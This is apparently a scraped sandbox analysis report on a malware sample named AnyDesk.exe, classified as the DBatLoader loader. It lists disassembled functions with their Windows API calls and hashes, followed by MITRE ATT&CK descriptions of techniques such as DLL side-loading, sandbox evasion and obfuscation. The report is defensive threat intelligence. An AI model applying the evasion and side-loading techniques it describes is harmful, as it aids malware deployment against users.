Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: ef3d3268dc41fa61327dd5ce77103cfd526eaa377d4e60167785be0005eadd26
Instruction ID: a8195402b6b1bf08e89d15f88235ef13805cd5548bd37360a17663204484fdc0
Opcode Fuzzy Hash: ef3d3268dc41fa61327dd5ce77103cfd526eaa377d4e60167785be0005eadd26
Instruction Fuzzy Hash: 4A411971A003689BDB21EB68CC84BDAB7FDAB18340F4444E6A54CE7255DB74AF898F50

Function 02B2AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2AD7D
GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2AE2E

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 9cc83188bde2d319ff3cab2f9dd9e9a5347b34d5f8b1351acbc4fe88b2d6d60d
Instruction ID: 0b8241d929ba484a055cdddf1365eee2a3b0cddd9625d2af44d89081842cc246
Opcode Fuzzy Hash: 9cc83188bde2d319ff3cab2f9dd9e9a5347b34d5f8b1351acbc4fe88b2d6d60d
Instruction Fuzzy Hash: E6412B71A003689FDB21EB68CC84BDAB7FDAB18340F4444E5A54CE7255DB74AF898F50

Function 02B21C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91b8cc20a86c75cc875005e33946e1524c556adfe5cae5f0d73b0ec20cad4b3a
Instruction ID: d42ced1c91559ca9f646a7235829c495fc3599f6dcc8756c02d40ccc9f19da01
Opcode Fuzzy Hash: 91b8cc20a86c75cc875005e33946e1524c556adfe5cae5f0d73b0ec20cad4b3a
Instruction Fuzzy Hash: 65A116B67303244BD718EA7C9C803ADB396DBC5265F1942BEE12DCB393DB64C94A8650

Function 02B294EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B295DA), ref: 02B29572
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B295DA), ref: 02B29578

Strings

yyyy, xrefs: 02B2954D

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 4c52d9408526b9c922345944c703548652ed5d5c41972e5218c1bcfdfac8df15
Instruction ID: 25f790663e3d4ad6268ae2823878551316095ee824850a30062a127bf6cb675f
Opcode Fuzzy Hash: 4c52d9408526b9c922345944c703548652ed5d5c41972e5218c1bcfdfac8df15
Instruction Fuzzy Hash: 67215C71A007689FDB11DFA8C881AAEB3BDEF09700F5104E5E94DE7651DB309E48CB65

Function 02B38338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02B381CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B3823C,?,?,00000000,?,02B37A7E,ntdll,00000000,00000000,02B37AC3,?,?,00000000), ref: 02B3820A
Part of subcall function 02B381CC: GetModuleHandleA.KERNELBASE(?), ref: 02B3821E

Part of subcall function 02B38274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
Part of subcall function 02B38274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
Part of subcall function 02B38274: GetProcAddress.KERNEL32(?,?), ref: 02B382D9

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B383C2), ref: 02B383A4

Strings

FlushInstructionCache, xrefs: 02B38351
Kernel32, xrefs: 02B38383

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: 16b1d31535d349acafd9d0fe86f50c04f647600a25ba44bbd75007b5be1588f2
Instruction ID: 9c078086d01f9367bf79dd161cdc4ade62432ef2569096279653f8e3e5835b42
Opcode Fuzzy Hash: 16b1d31535d349acafd9d0fe86f50c04f647600a25ba44bbd75007b5be1588f2
Instruction Fuzzy Hash: 74016D71648304AFE701EFA4DC42F5E77FDEB08B00F6184A0B904D7650DA70AE149E26

Function 02B26498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 02B264A1
TlsGetValue.KERNEL32(0000001D), ref: 02B264B6

Strings

hZ, xrefs: 02B264BB

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: AllocValue
String ID: hZ
API String ID: 1189806713-2274723117
Opcode ID: b69d212d16f9acf151019258de6dc36883c14c0d1764d61d6bd48e88b86b7003
Instruction ID: 61e2a274832902d0821c63fe690a804e616cb7cced9d9a864a4320b0e87b1041
Opcode Fuzzy Hash: b69d212d16f9acf151019258de6dc36883c14c0d1764d61d6bd48e88b86b7003
Instruction Fuzzy Hash: 1CC012B0D4035046DF00BB709040A053BDDFB10744B4849D16568C710CDB34E01CCF11

Function 02B3AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AF58
IsBadWritePtr.KERNEL32(?,00000004), ref: 02B3AF88
IsBadReadPtr.KERNEL32(?,00000008), ref: 02B3AFA7
IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AFB3

Memory Dump Source

Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
Instruction ID: 563421ab3bfb8f41d11e6f9c9921acddb87e813d0ba447d38dd576d16096ee39
Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
Instruction Fuzzy Hash: 6B21B4B26407199BDB12DF69CCC0BAE73A9EF44311F104691FD54D7380E734E8118BA0

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AnyDesk.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Windows Analysis Report
AnyDesk.exe

Function 02B3F7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071
COMMON

Function 02B25ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 02B3F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Function 02B3DD70 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Function 02B3E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Function 02B37D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Function 02B36DC8 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Function 02B21724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Function 02B388B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Function 02B21A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Function 02B3E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Function 02B2E364 Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Function 02B370DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Function 02B2E3FC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 02B389D0 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON